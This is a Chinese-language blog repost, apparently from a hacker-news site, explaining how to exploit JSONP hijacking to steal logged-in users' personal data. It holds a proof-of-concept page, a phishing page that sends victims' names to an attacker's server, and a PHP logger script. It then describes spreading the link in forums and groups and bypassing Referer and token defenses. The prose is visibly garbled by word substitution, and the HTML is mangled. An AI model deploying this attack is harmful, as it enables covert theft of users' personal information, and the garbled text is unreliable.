小学生都会挖掘的 *** ON Hijacking实战利用

访客5年前黑客资讯530

*** ON Hijacking缝隙的具体使用,有点相似与CSRF,不过原理使用 *** 不同,在这边文章我侧重解说json跨域绑架的使用环境建立与 *** 。
0×01缝隙的发掘
一般发掘的过程中,burpsuite署理的History做寻觅,过滤剩余不可能存在缝隙的一些链接,如下图所示:

咱们在回来包中json格局发现了如下的灵敏信息(用户Id,用户名,用户手机号码)。

0×02缝隙的证明之poc
提交缝隙,poc在众测时要分秒必争,所以这边用了最精简的一个POC。
假设回来的数据为:
txf({“data”:{“name”:”唐晓峰”}});
html>
head>
script>
function txf(a){
alert(a.data.name);
}
script>
script src=http://***.***.**/wm/User/getUserInfo?callback=txf>script>
body>
html>
即可如下弹窗:

0×03缝隙的使用之垂钓
1.预备一台web服务器,我直接phpstudy搭的。
附上服务器端的代码
json.php
$nickname=$_GET['name'];
$fp = fopen('info.txt','a');
$flag = fwrite($fp, "姓名:  ".$name."rn");
?>html>
垂钓.html
head>    title>txftitle>script> var xmlhttp;    function txf(a)    {    xmlhttp=new XMLHttpRequest() var x="http://***.***.***/json.php?name="+a.data.name; xmlhttp.open("GET", x, true); xmlhttp.send(); }script>>script src=http://***.***.***?callback=txf>script>head>body> textarea>垂钓啦,傻瓜textarea>>body>html>
把垂钓链接http://***.***.***/垂钓.html发给该网站已登陆的用户,如论坛,社区 *** 群,社区贴吧等,服务端即可获取到很多用户灵敏数据。
这边以hackone的一个项目为例:

0×04缝隙的修正与绕过
由于这个比如是小伙伴发过来的还没修正,所以都脱敏了,咱们再从开发修正的视点去考虑怎么绕过修正。
1.Referer白名单
子域名绕过,文件名绕过,空Referer绕过
2.添加token认证
token满足杂乱或许服务端加密,咱们无法绕过,假如token很简单,如纯数字,咱们能够测验遍历绕过
3.接口禁用
无敌的操作,无法绕过
总结:
十分有意思的一个绑架,曾经没有使用过,仅仅知道有这么个东西,一般众测或许项目上遇到我都是直接截图,声明一波灵敏信息走漏,然后就完毕了,很低危,这次实战使用之后,略微提高了一点逼格。
 

相关文章

根据时延的盲道研讨:受限环境下的内容回传信道

在一次缝隙赏金活动中,挖到个指令注入的洞,我先以时延作为证明向厂商提交该缝隙,厂商以国内网络环境差为由(确实得翻墙)拒收,几回交流,奉告若我能取回指定文件 secret.txt 才认可。方针是个受限环...

JSP运用过滤器避免SQL注入

 什么是SQL注入进犯?引证百度百科的解说: sql注入_百度百科: 所谓SQL注入,便是通过把SQL指令刺进到Web表单提交或输入域名或页面恳求的查询字符串,终究抵达诈骗服务器履行歹意的SQL指令。...

MySQL怎么避免SQL注入

 假如您经过网页获取用户输入的 数据 并将其刺进一个MySQL数据库,那么就有可能发生SQL注入安全的 问题 。 本章节将为咱们介绍怎么避免SQL注入,并经过脚原本过滤SQL中注入的字符。  所谓SQ...

网易云音乐PC客户端加密API逆向解析

1、前语 网上现已有许多的web端接口解析的办法了,可是对客户端的接口解析基本上找不到什么材料,本文首要剖析网易云音乐PC客户端的API接口交互方法。 经过内部的署理设置,运用fiddler作为署理东...

看我怎么发现比特币赌博网站缝隙并收成$12000赏金

Web浸透测验中比较难的便是测验那些交互较少的使用了,当你尝试了各种缝隙使用办法而无效之后,很或许就会抛弃了。但有时分,这种花费时刻的投入和研讨,对白帽本身的技能进步来说,仍是十分有用的。这儿我就共...

Nmap备忘单:从探究到缝隙使用 Part1

在侦办过程中,信息搜集的初始阶段是扫描。 侦办是什么? 侦办是尽或许多的搜集方针网络的信息。从黑客的视点来看,信息搜集对进犯十分有协助,一般来说能够搜集到以下信息: 电子邮件、端口号、操作体系、运转...